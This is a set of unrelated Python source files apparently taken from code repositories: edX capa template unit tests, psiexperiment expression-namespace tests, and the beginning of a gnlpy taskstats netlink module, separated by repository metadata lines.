choices = [('1', 'choice 1'), ('2', 'choice 2'), ('3', 'choice 3')]
self.context = {'id': '1',
'choices': choices,
'status': Status('correct'),
'question_label': 'test',
'label': 'test',
'input_type': 'checkbox',
'name_array_suffix': '1',
'value': '3'}
super(ChoiceGroupTemplateTest, self).setUp()
def test_problem_marked_correct(self):
"""
Test conditions under which the entire problem
(not a particular option) is marked correct.
"""
self.context['status'] = Status('correct')
self.context['input_type'] = 'checkbox'
self.context['value'] = ['1', '2']
self.context['question_label'] = ['']
# Should mark the entire problem correct
xml = self.render_to_xml(self.context)
xpath = "//div[@class='indicator_container']/span[@class='status correct']"
self.assert_has_xpath(xml, xpath, self.context)
# Should NOT mark individual options
self.assert_no_xpath(xml, "//label[@class='choicegroup_incorrect']",
self.context)
self.assert_no_xpath(xml, "//label[@class='choicegroup_correct']",
self.context)
def test_problem_marked_incorrect(self):
"""
Test all conditions under which the entire problem
(not a particular option) is marked incorrect.
"""
conditions = [
{'status': Status('incorrect'), 'input_type': 'radio', 'value': ''},
{'status': Status('incorrect'), 'input_type': 'checkbox', 'value': []},
{'status': Status('incorrect'), 'input_type': 'checkbox', 'value': ['2']},
{'status': Status('incorrect'), 'input_type': 'checkbox', 'value': ['2', '3']},
{'status': Status('incomplete'), 'input_type': 'radio', 'value': ''},
{'status': Status('incomplete'), 'input_type': 'checkbox', 'value': []},
{'status': Status('incomplete'), 'input_type': 'checkbox', 'value': ['2']},
{'status': Status('incomplete'), 'input_type': 'checkbox', 'value': ['2', '3']}]
for test_conditions in conditions:
self.context.update(test_conditions)
xml = self.render_to_xml(self.context)
xpath = "//div[@class='indicator_container']/span[@class='status incorrect']"
self.assert_has_xpath(xml, xpath, self.context)
# Should NOT mark individual options
self.assert_no_xpath(xml,
"//label[@class='choicegroup_incorrect']",
self.context)
self.assert_no_xpath(xml,
"//label[@class='choicegroup_correct']",
self.context)
def test_problem_marked_unsubmitted(self):
"""
Test all conditions under which the entire problem
(not a particular option) is marked unanswered.
"""
conditions = [
{'status': Status('unsubmitted'), 'input_type': 'radio', 'value': ''},
{'status': Status('unsubmitted'), 'input_type': 'radio', 'value': []},
{'status': Status('unsubmitted'), 'input_type': 'checkbox', 'value': []},
{'input_type': 'radio', 'value': ''},
{'input_type': 'radio', 'value': []},
{'input_type': 'checkbox', 'value': []},
{'input_type': 'checkbox', 'value': ['1']},
{'input_type': 'checkbox', 'value': ['1', '2']}]
self.context['status'] = Status('unanswered')
for test_conditions in conditions:
self.context.update(test_conditions)
xml = self.render_to_xml(self.context)
xpath = "//div[@class='indicator_container']/span[@class='status unanswered']"
self.assert_has_xpath(xml, xpath, self.context)
# Should NOT mark individual options
self.assert_no_xpath(xml,
"//label[@class='choicegroup_incorrect']",
self.context)
self.assert_no_xpath(xml,
"//label[@class='choicegroup_correct']",
self.context)
def test_option_marked_correct(self):
"""
Test conditions under which a particular option
(not the entire problem) is marked correct.
"""
conditions = [
{'input_type': 'radio', 'question_label': '', 'value': '2'},
{'input_type': 'radio', 'question_label': '', 'value': ['2']}]
self.context['status'] = Status('correct')
for test_conditions in conditions:
self.context.update(test_conditions)
xml = self.render_to_xml(self.context)
xpath = "//label[@class='choicegroup_correct']"
self.assert_has_xpath(xml, xpath, self.context)
# Should NOT mark the whole problem
xpath = "//div[@class='indicator_container']/span"
self.assert_no_xpath(xml, xpath, self.context)
def test_option_marked_incorrect(self):
"""
Test conditions under which a particular option
(not the entire problem) is marked incorrect.
"""
conditions = [
{'input_type': 'radio', 'value': '2'},
{'input_type': 'radio', 'value': ['2']}]
self.context['status'] = Status('incorrect')
for test_conditions in conditions:
self.context.update(test_conditions)
xml = self.render_to_xml(self.context)
xpath = "//label[@class='choicegroup_incorrect']"
self.assert_has_xpath(xml, xpath, self.context)
# Should NOT mark the whole problem
xpath = "//div[@class='indicator_container']/span"
self.assert_no_xpath(xml, xpath, self.context)
def test_never_show_correctness(self):
"""
Test conditions under which we tell the template to
NOT show correct/incorrect, but instead show a message.
This is used, for example, by the Justice course to ask
questions without specifying a correct answer. When
the student responds, the problem displays "Thank you
for your response"
"""
conditions = [
{'input_type': 'radio', 'status': Status('correct'), 'question_label': '', 'value': ''},
{'input_type': 'radio', 'status': Status('correct'), 'question_label': '', 'value': '2'},
{'input_type': 'radio', 'status': Status('correct'), 'question_label': '', 'value': ['2']},
{'input_type': 'radio', 'status': Status('incorrect'), 'question_label': '', 'value': '2'},
{'input_type': 'radio', 'status': Status('incorrect'), 'question_label': '', 'value': []},
{'input_type': 'radio', 'status': Status('incorrect'), 'question_label': '', 'value': ['2']},
{'input_type': 'checkbox', 'status': Status('correct'), 'question_label': '', 'value': []},
{'input_type': 'checkbox', 'status': Status('correct'), 'question_label': '', 'value': ['2']},
{'input_type': 'checkbox', 'status': Status('incorrect'), 'question_label': '', 'value': []},
{'input_type': 'checkbox', 'status': Status('incorrect'), 'question_label': '', 'value': ['2']}]
self.context['show_correctness'] = 'never'
self.context['submitted_message'] = 'Test message'
for test_conditions in conditions:
self.context.update(test_conditions)
xml = self.render_to_xml(self.context)
# Should NOT mark the entire problem correct/incorrect
xpath = "//div[@class='indicator_container']/span[@class='status correct']"
self.assert_no_xpath(xml, xpath, self.context)
xpath = "//div[@class='indicator_container']/span[@class='status incorrect']"
self.assert_no_xpath(xml, xpath, self.context)
# Should NOT mark individual options
self.assert_no_xpath(xml,
"//label[@class='choicegroup_incorrect']",
self.context)
self.assert_no_xpath(xml,
"//label[@class='choicegroup_correct']",
self.context)
# Expect to see the message
self.assert_has_text(xml, "//div[@class='capa_alert']",
self.context['submitted_message'])
def test_no_message_before_submission(self):
"""
Ensure that we don't show the `submitted_message`
before submitting.
"""
conditions = [
{'input_type': 'radio', 'status': Status('unsubmitted'), 'question_label': '', 'value': ''},
{'input_type': 'radio', 'status': Status('unsubmitted'), 'question_label': '', 'value': []},
{'input_type': 'checkbox', 'status': Status('unsubmitted'), 'question_label': '', 'value': []},
# These tests expose bug #365
# When the bug is fixed, uncomment these cases.
#{'input_type': 'radio', 'status': 'unsubmitted', 'value': '2'},
#{'input_type': 'radio', 'status': 'unsubmitted', 'value': ['2']},
#{'input_type': 'radio', 'status': 'unsubmitted', 'value': '2'},
#{'input_type': 'radio', 'status': 'unsubmitted', 'value': ['2']},
#{'input_type': 'checkbox', 'status': 'unsubmitted', 'value': ['2']},
#{'input_type': 'checkbox', 'status': 'unsubmitted', 'value': ['2']}]
]
self.context['show_correctness'] = 'never'
self.context['submitted_message'] = 'Test message'
for test_conditions in conditions:
self.context.update(test_conditions)
xml = self.render_to_xml(self.context)
# Expect that we do NOT see the message yet
self.assert_no_xpath(xml, "//div[@class='capa_alert']", self.context)
def test_label(self):
xml = self.render_to_xml(self.context)
xpath = "//fieldset/legend"
self.assert_has_text(xml, xpath, self.context['question_label'])
class TextlineTemplateTest(TemplateTestCase):
"""
Test mako template for `<textline>` input.
"""
TEMPLATE_NAME = 'textline.html'
def setUp(self):
self.context = {'id': '1',
'status': Status('correct'),
'label': 'test',
'value': '3',
'preprocessor': None,
'trailing_text': None}
super(TextlineTemplateTest, self).setUp()
def test_section_class(self):
cases = [({}, ' capa_inputtype textline'),
({'do_math': True}, 'text-input-dynamath capa_inputtype textline'),
({'inline': True}, ' capa_inputtype inline textline'),
({'do_math': True, 'inline': True}, 'text-input-dynamath capa_inputtype inline textline'), ]
for (context, css_class) in cases:
base_context = self.context.copy()
base_context.update(context)
xml = self.render_to_xml(base_context)
xpath = "//div[@class='%s']" % css_class
self.assert_has_xpath(xml, xpath, self.context)
def test_status(self):
cases = [('correct', 'correct', 'correct'),
('unsubmitted', 'unanswered', 'unanswered'),
('incorrect', 'incorrect', 'incorrect'),
('incomplete', 'incorrect', 'incomplete')]
for (context_status, div_class, status_mark) in cases:
self.context['status'] = Status(context_status)
xml = self.render_to_xml(self.context)
# Expect that we get a <div> with correct class
xpath = "//div[@class='%s ']" % div_class
self.assert_has_xpath(xml, xpath, self.context)
# Expect that we get a <p> with class="status"
# (used to by CSS to draw the green check / red x)
self.assert_has_text(xml, "//p[@class='status']",
status_mark, exact=False)
def test_label(self):
xml = self.render_to_xml(self.context)
xpath = "//input[@aria-label='%s']" % self.context['label']
self.assert_has_xpath(xml, xpath, self.context)
def test_hidden(self):
self.context['hidden'] = True
xml = self.render_to_xml(self.context)
xpath = "//div[@style='display:none;']"
self.assert_has_xpath(xml, xpath, self.context)
xpath = "//input[@style='display:none;']"
self.assert_has_xpath(xml, xpath, self.context)
def test_do_math(self):
self.context['do_math'] = True
xml = self.render_to_xml(self.context)
xpath = "//input[@class='math']"
self.assert_has_xpath(xml, xpath, self.context)
xpath = "//div[@class='equation']"
self.assert_has_xpath(xml, xpath, self.context)
xpath = "//textarea[@id='input_1_dynamath']"
self.assert_has_xpath(xml, xpath, self.context)
def test_size(self):
self.context['size'] = '20'
xml = self.render_to_xml(self.context)
xpath = "//input[@size='20']"
self.assert_has_xpath(xml, xpath, self.context)
def test_preprocessor(self):
self.context['preprocessor'] = {'class_name': 'test_class',
'script_src': 'test_script'}
xml = self.render_to_xml(self.context)
xpath = "//div[contains(@class, 'text-input-dynamath_data') and @data-preprocessor='test_class']"
self.assert_has_xpath(xml, xpath, self.context)
xpath = "//div[@class='script_placeholder' and @data-src='test_script']"
self.assert_has_xpath(xml, xpath, self.context)
def test_do_inline_and_preprocessor(self):
self.context['preprocessor'] = {'class_name': 'test_class',
'script_src': 'test_script'}
self.context['inline'] = True
xml = self.render_to_xml(self.context)
xpath = "//div[contains(@class, 'text-input-dynamath_data inline') and @data-preprocessor='test_class']"
self.assert_has_xpath(xml, xpath, self.context)
def test_do_inline(self):
cases = [('correct', 'correct'),
('unsubmitted', 'unanswered'),
('incorrect', 'incorrect'),
('incomplete', 'incorrect')]
self.context['inline'] = True
for (context_status, div_class) in cases:
self.context['status'] = Status(context_status)
xml = self.render_to_xml(self.context)
# Expect that we get a <div> with correct class
xpath = "//div[@class='%s inline']" % div_class
self.assert_has_xpath(xml, xpath, self.context)
def test_message(self):
self.context['msg'] = "Test message"
xml = self.render_to_xml(self.context)
xpath = "//span[@class='message']"
self.assert_has_text(xml, xpath, self.context['msg'])
class FormulaEquationInputTemplateTest(TemplateTestCase):
"""
Test make template for `<formulaequationinput>`s.
"""
TEMPLATE_NAME = 'formulaequationinput.html'
def setUp(self):
self.context = {
'id': 2,
'value': 'PREFILLED_VALUE',
'status': Status('unsubmitted'),
'label': 'test',
'previewer': 'file.js',
'reported_status': 'REPORTED_STATUS',
}
super(FormulaEquationInputTemplateTest, self).setUp()
def test_no_size(self):
xml = self.render_to_xml(self.context)
self.assert_no_xpath(xml, "//input[@size]", self.context)
def test_size(self):
self.context['size'] = '40'
xml = self.render_to_xml(self.context)
self.assert_has_xpath(xml, "//input[@size='40']", self.context)
class AnnotationInputTemplateTest(TemplateTestCase):
"""
Test mako template for `<annotationinput>` input.
"""
TEMPLATE_NAME = 'annotationinput.html'
def setUp(self):
self.context = {'id': 2,
'value': '<p>Test value</p>',
'title': '<h1>This is a title</h1>',
'text': '<p><b>This</b> is a test.</p>',
'comment': '<p>This is a test comment</p>',
'comment_prompt': '<p>This is a test comment prompt</p>',
'comment_value': '<p>This is the value of a test comment</p>',
'tag_prompt': '<p>This is a tag prompt</p>',
'options': [],
'has_options_value': False,
'debug': False,
'status': Status('unsubmitted'),
'return_to_annotation': False,
'msg': '<p>This is a test message</p>', }
super(AnnotationInputTemplateTest, self).setUp()
def test_return_to_annotation(self):
"""
Test link for `Return to Annotation` appears if and only if
the flag is set.
"""
xpath = "//a[@class='annotation-return']"
# If return_to_annotation set, then show the link
self.context['return_to_annotation'] = True
xml = self.render_to_xml(self.context)
self.assert_has_xpath(xml, xpath, self.context)
# Otherwise, do not show the links
self.context['return_to_annotation'] = False
xml = self.render_to_xml(self.context)
self.assert_no_xpath(xml, xpath, self.context)
def test_option_selection(self):
"""
Test that selected options are selected.
"""
# Create options 0-4 and select option 2
self.context['options_value'] = [2]
self.context['options'] = [
{'id': id_num,
'choice': 'correct',
'description': '<p>Unescaped <b>HTML {0}</b></p>'.format(id_num)}
for id_num in range(0, 5)]
xml = self.render_to_xml(self.context)
# Expect that each option description is visible
# with unescaped HTML.
# Since the HTML is unescaped, we can traverse the XML tree
for id_num in range(0, 5):
xpath = "//span[@data-id='{0}']/p/b".format(id_num)
self.assert_has_text(xml, xpath, 'HTML {0}'.format(id_num), exact=False)
# Expect that the correct option is selected
xpath = "//span[contains(@class,'selected')]/p/b"
self.assert_has_text(xml, xpath, 'HTML 2', exact=False)
def test_submission_status(self):
"""
Test that the submission status displays correctly.
"""
# Test cases of `(input_status, expected_css_class)` tuples
test_cases = [('unsubmitted', 'unanswered'),
('incomplete', 'incorrect'),
('incorrect', 'incorrect')]
for (input_status, expected_css_class) in test_cases:
self.context['status'] = Status(input_status)
xml = self.render_to_xml(self.context)
xpath = "//span[@class='status {0}']".format(expected_css_class)
self.assert_has_xpath(xml, xpath, self.context)
# If individual options are being marked, then expect
# just the option to be marked incorrect, not the whole problem
self.context['has_options_value'] = True
self.context['status'] = Status('incorrect')
xpath = "//span[@class='incorrect']"
xml = self.render_to_xml(self.context)
self.assert_no_xpath(xml, xpath, self.context)
def test_display_html_comment(self):
"""
Test that HTML comment and comment prompt render.
"""
self.context['comment'] = "<p>Unescaped <b>comment HTML</b></p>"
self.context['comment_prompt'] = "<p>Prompt <b>prompt HTML</b></p>"
self.context['text'] = "<p>Unescaped <b>text</b></p>"
xml = self.render_to_xml(self.context)
# Because the HTML is unescaped, we should be able to
# descend to the <b> tag
xpath = "//div[@class='block']/p/b"
self.assert_has_text(xml, xpath, 'prompt HTML')
xpath = "//div[@class='block block-comment']/p/b"
self.assert_has_text(xml, xpath, 'comment HTML')
xpath = "//div[@class='block block-highlight']/p/b"
self.assert_has_text(xml, xpath, 'text')
def test_display_html_tag_prompt(self):
"""
Test that HTML tag prompts render.
"""
self.context['tag_prompt'] = "<p>Unescaped <b>HTML</b></p>"
xml = self.render_to_xml(self.context)
# Because the HTML is unescaped, we should be able to
# descend to the <b> tag
xpath = "//div[@class='block']/p/b"
self.assert_has_text(xml, xpath, 'HTML')
class MathStringTemplateTest(TemplateTestCase):
"""
Test mako template for `<mathstring>` input.
"""
TEMPLATE_NAME = 'mathstring.html'
def setUp(self):
self.context = {'isinline': False, 'mathstr': '', 'tail': ''}
super(MathStringTemplateTest, self).setUp()
def test_math_string_inline(self):
self.context['isinline'] = True
self.context['mathstr'] = 'y = ax^2 + bx + c'
xml = self.render_to_xml(self.context)
xpath = "//section[@class='math-string']/span[1]"
self.assert_has_text(xml, xpath,
'[mathjaxinline]y = ax^2 + bx + c[/mathjaxinline]')
def test_math_string_not_inline(self):
self.context['isinline'] = False
self.context['mathstr'] = 'y = ax^2 + bx + c'
xml = self.render_to_xml(self.context)
xpath = "//section[@class='math-string']/span[1]"
self.assert_has_text(xml, xpath,
'[mathjax]y = ax^2 + bx + c[/mathjax]')
def test_tail_html(self):
self.context['tail'] = "<p>This is some <b>tail</b> <em>HTML</em></p>"
xml = self.render_to_xml(self.context)
# HTML from `tail` should NOT be escaped.
# We should be able to traverse it as part of the XML tree
xpath = "//section[@class='math-string']/span[2]/p/b"
self.assert_has_text(xml, xpath, 'tail')
xpath = "//section[@class='math-string']/span[2]/p/em"
self.assert_has_text(xml, xpath, 'HTML')
class OptionInputTemplateTest(TemplateTestCase):
"""
Test mako template for `<optioninput>` input.
"""
TEMPLATE_NAME = 'optioninput.html'
def setUp(self):
self.context = {
'id': 2,
'options': [],
'status': Status('unsubmitted'),
'label': 'test',
'value': 0
}
super(OptionInputTemplateTest, self).setUp()
def test_select_options(self):
# Create options 0-4, and select option 2
self.context['options'] = [(id_num, '<b>Option {0}</b>'.format(id_num))
for id_num in range(0, 5)]
self.context['value'] = 2
xml = self.render_to_xml(self.context)
# Should have a dummy default
xpath = "//option[@value='option_2_dummy_default']"
self.assert_has_xpath(xml, xpath, self.context)
# Should have each of the options, with the correct description
# The description HTML should NOT be escaped
# (that's why we descend into the <b> tag)
for id_num in range(0, 5):
xpath = "//option[@value='{0}']/b".format(id_num)
self.assert_has_text(xml, xpath, 'Option {0}'.format(id_num))
# Should have the correct option selected
xpath = "//option[@selected='true']/b"
self.assert_has_text(xml, xpath, 'Option 2')
def test_status(self):
# Test cases, where each tuple represents
# `(input_status, expected_css_class)`
test_cases = [('unsubmitted', 'status unanswered'),
('correct', 'status correct'),
('incorrect', 'status incorrect'),
('incomplete', 'status incorrect')]
for (input_status, expected_css_class) in test_cases:
self.context['status'] = Status(input_status)
xml = self.render_to_xml(self.context)
xpath = "//span[@class='{0}']".format(expected_css_class)
self.assert_has_xpath(xml, xpath, self.context)
def test_label(self):
xml = self.render_to_xml(self.context)
xpath = "//select[@aria-label='%s']" % self.context['label']
self.assert_has_xpath(xml, xpath, self.context)
class DragAndDropTemplateTest(TemplateTestCase):
"""
Test mako template for `<draganddropinput>` input.
"""
TEMPLATE_NAME = 'drag_and_drop_input.html'
def setUp(self):
self.context = {'id': 2,
'drag_and_drop_json': '',
'value': 0,
'status': Status('unsubmitted'),
'msg': ''}
super(DragAndDropTemplateTest, self).setUp()
def test_status(self):
# Test cases, where each tuple represents
# `(input_status, expected_css_class, expected_text)`
test_cases = [('unsubmitted', 'unanswered', 'unanswered'),
('correct', 'correct', 'correct'),
('incorrect', 'incorrect', 'incorrect'),
('incomplete', 'incorrect', 'incomplete')]
for (input_status, expected_css_class, expected_text) in test_cases:
self.context['status'] = Status(input_status)
xml = self.render_to_xml(self.context)
# Expect a <div> with the status
xpath = "//div[@class='{0}']".format(expected_css_class)
self.assert_has_xpath(xml, xpath, self.context)
# Expect a <p> with the status
xpath = "//p[@class='status']"
self.assert_has_text(xml, xpath, expected_text, exact=False)
def test_drag_and_drop_json_html(self):
json_with_html = json.dumps({'test': '<p>Unescaped <b>HTML</b></p>'})
self.context['drag_and_drop_json'] = json_with_html
xml = self.render_to_xml(self.context)
# Assert that the JSON-encoded string was inserted without
# escaping the HTML. We should be able to traverse the XML tree.
xpath = "//div[@class='drag_and_drop_problem_json']/p/b"
self.assert_has_text(xml, xpath, 'HTML')
class ChoiceTextGroupTemplateTest(TemplateTestCase):
"""Test mako template for `<choicetextgroup>` input"""
TEMPLATE_NAME = 'choicetext.html'
VALUE_DICT = {'1_choiceinput_0bc': '1_choiceinput_0bc', '1_choiceinput_0_textinput_0': '0',
'1_choiceinput_1_textinput_0': '0'}
EMPTY_DICT = {'1_choiceinput_0_textinput_0': '',
'1_choiceinput_1_textinput_0': ''}
BOTH_CHOICE_CHECKBOX = {'1_choiceinput_0bc': 'choiceinput_0',
'1_choiceinput_1bc': 'choiceinput_1',
'1_choiceinput_0_textinput_0': '0',
'1_choiceinput_1_textinput_0': '0'}
WRONG_CHOICE_CHECKBOX = {'1_choiceinput_1bc': 'choiceinput_1',
'1_choiceinput_0_textinput_0': '0',
'1_choiceinput_1_textinput_0': '0'}
def setUp(self):
choices = [
(
'1_choiceinput_0bc',
[
{'tail_text': '', 'type': 'text', 'value': '', 'contents': ''},
{'tail_text': '', 'type': 'textinput', 'value': '', 'contents': 'choiceinput_0_textinput_0'},
]
),
(
'1_choiceinput_1bc',
[
{'tail_text': '', 'type': 'text', 'value': '', 'contents': ''},
{'tail_text': '', 'type': 'textinput', 'value': '', 'contents': 'choiceinput_1_textinput_0'},
]
)
]
self.context = {
'id': '1',
'choices': choices,
'status': Status('correct'),
'input_type': 'radio',
'label': 'choicetext label',
'value': self.VALUE_DICT,
}
super(ChoiceTextGroupTemplateTest, self).setUp()
def test_grouping_tag(self):
"""
Tests whether we are using a section or a label to wrap choice elements.
Section is used for checkbox, so inputting text does not deselect
"""
input_tags = ('radio', 'checkbox')
self.context['status'] = Status('correct')
xpath = "//section[@id='forinput1_choiceinput_0bc']"
self.context['value'] = {}
for input_type in input_tags:
self.context['input_type'] = input_type
xml = self.render_to_xml(self.context)
self.assert_has_xpath(xml, xpath, self.context)
def test_problem_marked_correct(self):
"""Test conditions under which the entire problem
(not a particular option) is marked correct"""
self.context['status'] = Status('correct')
self.context['input_type'] = 'checkbox'
self.context['value'] = self.VALUE_DICT
# Should mark the entire problem correct
xml = self.render_to_xml(self.context)
xpath = "//div[@class='indicator_container']/span[@class='status correct']"
self.assert_has_xpath(xml, xpath, self.context)
# Should NOT mark individual options
self.assert_no_xpath(xml, "//label[@class='choicetextgroup_incorrect']",
self.context)
self.assert_no_xpath(xml, "//label[@class='choicetextgroup_correct']",
self.context)
def test_problem_marked_incorrect(self):
"""Test all conditions under which the entire problem
(not a particular option) is marked incorrect"""
grouping_tags = {'radio': 'label', 'checkbox': 'section'}
conditions = [
{'status': Status('incorrect'), 'input_type': 'radio', 'value': {}},
{'status': Status('incorrect'), 'input_type': 'checkbox', 'value': self.WRONG_CHOICE_CHECKBOX},
{'status': Status('incorrect'), 'input_type': 'checkbox', 'value': self.BOTH_CHOICE_CHECKBOX},
{'status': Status('incorrect'), 'input_type': 'checkbox', 'value': self.VALUE_DICT},
{'status': Status('incomplete'), 'input_type': 'radio', 'value': {}},
{'status': Status('incomplete'), 'input_type': 'checkbox', 'value': self.WRONG_CHOICE_CHECKBOX},
{'status': Status('incomplete'), 'input_type': 'checkbox', 'value': self.BOTH_CHOICE_CHECKBOX},
{'status': Status('incomplete'), 'input_type': 'checkbox', 'value': self.VALUE_DICT}]
for test_conditions in conditions:
self.context.update(test_conditions)
xml = self.render_to_xml(self.context)
xpath = "//div[@class='indicator_container']/span[@class='status incorrect']"
self.assert_has_xpath(xml, xpath, self.context)
# Should NOT mark individual options
grouping_tag = grouping_tags[test_conditions['input_type']]
self.assert_no_xpath(xml,
"//{0}[@class='choicetextgroup_incorrect']".format(grouping_tag),
self.context)
self.assert_no_xpath(xml,
"//{0}[@class='choicetextgroup_correct']".format(grouping_tag),
self.context)
def test_problem_marked_unsubmitted(self):
"""Test all conditions under which the entire problem
(not a particular option) is marked unanswered"""
grouping_tags = {'radio': 'label', 'checkbox': 'section'}
conditions = [
{'status': Status('unsubmitted'), 'input_type': 'radio', 'value': {}},
{'status': Status('unsubmitted'), 'input_type': 'radio', 'value': self.EMPTY_DICT},
{'status': Status('unsubmitted'), 'input_type': 'checkbox', 'value': {}},
{'status': Status('unsubmitted'), 'input_type': 'checkbox', 'value': self.EMPTY_DICT},
{'status': Status('unsubmitted'), 'input_type': 'checkbox', 'value': self.VALUE_DICT},
{'status': Status('unsubmitted'), 'input_type': 'checkbox', 'value': self.BOTH_CHOICE_CHECKBOX},
]
self.context['status'] = Status('unanswered')
for test_conditions in conditions:
self.context.update(test_conditions)
xml = self.render_to_xml(self.context)
xpath = "//div[@class='indicator_container']/span[@class='status unanswered']"
self.assert_has_xpath(xml, xpath, self.context)
# Should NOT mark individual options
grouping_tag = grouping_tags[test_conditions['input_type']]
self.assert_no_xpath(xml,
"//{0}[@class='choicetextgroup_incorrect']".format(grouping_tag),
self.context)
self.assert_no_xpath(xml,
"//{0}[@class='choicetextgroup_correct']".format(grouping_tag),
self.context)
def test_option_marked_correct(self):
"""Test conditions under which a particular option
(not the entire problem) is marked correct."""
conditions = [
{'input_type': 'radio', 'question_label': '', 'value': self.VALUE_DICT}]
self.context['status'] = 'correct'
for test_conditions in conditions:
self.context.update(test_conditions)
xml = self.render_to_xml(self.context)
xpath = "//section[@id='forinput1_choiceinput_0bc' and\
@class='choicetextgroup_correct']"
self.assert_has_xpath(xml, xpath, self.context)
# Should NOT mark the whole problem
xpath = "//div[@class='indicator_container']/span"
self.assert_no_xpath(xml, xpath, self.context)
def test_option_marked_incorrect(self):
"""Test conditions under which a particular option
(not the entire problem) is marked incorrect."""
conditions = [
{'input_type': 'radio', 'question_label': '', 'value': self.VALUE_DICT}]
self.context['status'] = 'incorrect'
for test_conditions in conditions:
self.context.update(test_conditions)
xml = self.render_to_xml(self.context)
xpath = "//section[@id='forinput1_choiceinput_0bc' and\
@class='choicetextgroup_incorrect']"
self.assert_has_xpath(xml, xpath, self.context)
# Should NOT mark the whole problem
xpath = "//div[@class='indicator_container']/span"
self.assert_no_xpath(xml, xpath, self.context)
def test_label(self):
xml = self.render_to_xml(self.context)
xpath = "//fieldset[@aria-label='%s']" % self.context['label']
self.assert_has_xpath(xml, xpath, self.context)
|
agpl-3.0
| -6,188,294,893,259,739,000 | 39.686983 | 113 | 0.551708 | false |
bburan/psiexperiment
|
tests/test_expression.py
|
1
|
3838
|
import pytest
import unittest
import numpy as np
from atom.api import Atom, Bool
from psi.context.expression import Expr, ExpressionNamespace
class TestExpression(unittest.TestCase):
def test_eval(self):
context = dict(a=1, b=2, c=3)
test_cases = [
('1+2', 3),
('b*c', 6),
('1+c', 4)
]
for expr, expected in test_cases:
actual = Expr(expr).evaluate(context)
self.assertEqual(actual, expected)
def test_symtable(self):
expr = Expr('randint(10)')
expr.evaluate(dict(randint=np.random.randint))
expr = Expr('np.random.randint(x)')
expr.evaluate(dict(x=5, np=np))
class TestExpressionNamespace(unittest.TestCase):
EXPRESSIONS = {
'd': '10',
'a': '10*5',
'b': 'a+1',
'c': 'b*a',
'e': 'd*2',
'f': 'd*bar',
'g': 'random.randint(b)',
}
def test_evaluation(self):
ns = ExpressionNamespace(self.EXPRESSIONS)
self.assertEqual(ns.get_value('c'), 2550)
self.assertEqual(ns.get_value('e'), 20)
self.assertEqual(ns.get_value('d'), 10)
self.assertEqual(ns.get_value('f', {'bar': 1.5}), 15)
def test_evaluation_override(self):
ns = ExpressionNamespace(self.EXPRESSIONS)
self.assertEqual(ns.get_value('c', {'a': 2}), 6)
self.assertEqual(ns.get_value('a', {'a': 2}), 2)
def test_cache(self):
        # We know that for this particular seed, a fresh draw after reset()
        # will not return the same value as the first (cached) draw.
random = np.random.RandomState(seed=1)
ns = ExpressionNamespace(self.EXPRESSIONS, {'random': random})
initial = ns.get_value('g')
self.assertEqual(initial, ns.get_value('g'))
self.assertEqual(initial, ns.get_value('g'))
ns.reset()
self.assertNotEqual(initial, ns.get_value('g'))
def test_extra_context(self):
random = np.random.RandomState(seed=1)
ns = ExpressionNamespace(self.EXPRESSIONS, {'random': random})
ns.set_values({'bar': 3.1})
ns.set_value('z', 32)
values = ns.get_values()
self.assertTrue('z' in values)
self.assertTrue('bar' in values)
self.assertEqual(values['z'], 32)
self.assertEqual(values['f'], 31)
class ANT(Atom):
observed = Bool()
def __init__(self, *args, **kwargs):
super(ANT, self).__init__(*args, **kwargs)
def mark_observed(self, event):
self.observed = True
@pytest.mark.skip(reason='disabled notification for value change ' \
'since this produced high overhead')
class TestAtomNotification(unittest.TestCase):
def setUp(self):
expressions = {
'a': Expr('2'),
'b': Expr('a*10'),
}
self.ant = ANT()
self.ns = ExpressionNamespace(expressions)
self.ns.observe('_locals', self.ant.mark_observed)
def test_get_value_notification(self):
for v in ('a', 'b'):
self.ant.observed = False
self.ns.get_value(v)
self.assertTrue(self.ant.observed)
def test_set_value_notification(self):
self.ant.observed = False
self.ns.set_value('c', 5)
self.assertTrue(self.ant.observed)
def test_get_value_notification_no_change(self):
self.ant.observed = False
self.ns.get_value('b')
self.assertTrue(self.ant.observed)
# Should not trigger notification because 'a' was already computed when
# getting 'b', so there was no change in value.
self.ant.observed = False
self.ns.get_value('a')
self.assertFalse(self.ant.observed)
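# Added illustration (not part of the original test suite): the namespace
# resolves dependent expressions lazily, so asking for 'b' evaluates 'a'
# on demand.
#
#   ns = ExpressionNamespace({'a': '2', 'b': 'a*10'})
#   assert ns.get_value('b') == 20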
|
mit
| -7,155,792,216,147,302,000 | 29.459016 | 79 | 0.563835 | false |
nuclon/gnlpy
|
taskstats.py
|
1
|
3337
|
# Copyright (c) 2015-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
"""Taskstats module
This module exists to expose the taskstats api to python
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# @lint-avoid-python-3-compatibility-imports
# from __future__ import unicode_literals
import struct
import gnlpy.netlink as netlink
# These are attr_list_types which are nestable. The command attribute list
# is ultimately referenced by the messages which are passed down to the
# kernel via netlink. These structures must match the type and ordering
# that the kernel expects.
class Taskstats(object):
__fields__ = [
'version', 'exitcode', 'flag', 'nice', 'cpu_count',
'cpu_delay_total', 'blkio_count', 'blkio_delay_total',
'swapin_count', 'swapin_delay_total',
'cpu_run_real_total', 'cpu_run_virtual_total', 'comm',
'sched', 'uid', 'gid', 'pid', 'ppid', 'btime', 'etime',
'utime', 'stime', 'minflt', 'majflt', 'coremem',
'virtmem', 'hiwater_rss', 'hiwater_vm', 'read_char',
'write_char', 'read_syscalls', 'write_syscalls',
'read_bytes', 'write_bytes', 'cancelled_write_bytes',
'nvcsw', 'nivcsw', 'utimescaled', 'stimescaled',
'cpu_scaled_run_real_total', 'freepages_count',
'freepages_delay_total'
]
def __init__(self, **kwargs):
self.__dict__.update(kwargs)
def __repr__(self):
arr = ['%s=%s' % (f, repr(self.__dict__[f])) for f in self.__fields__]
return 'TaskStats(%s)' % ', '.join(arr)
@staticmethod
def unpack(val):
fmt = 'HIBBQQQQQQQQ32sQxxxIIIIIQQQQQQQQQQQQQQQQQQQQQQQ'
attrs = dict(zip(Taskstats.__fields__, struct.unpack(fmt, val)))
assert attrs['version'] == 8, "Bad version: %d" % attrs["version"]
attrs['comm'] = attrs['comm'].rstrip('\0')
return Taskstats(**attrs)
TaskstatsType = netlink.create_attr_list_type(
'TaskstatsType',
('PID', netlink.U32Type),
('TGID', netlink.U32Type),
('STATS', Taskstats),
('AGGR_PID', netlink.RecursiveSelf),
('AGGR_TGID', netlink.RecursiveSelf),
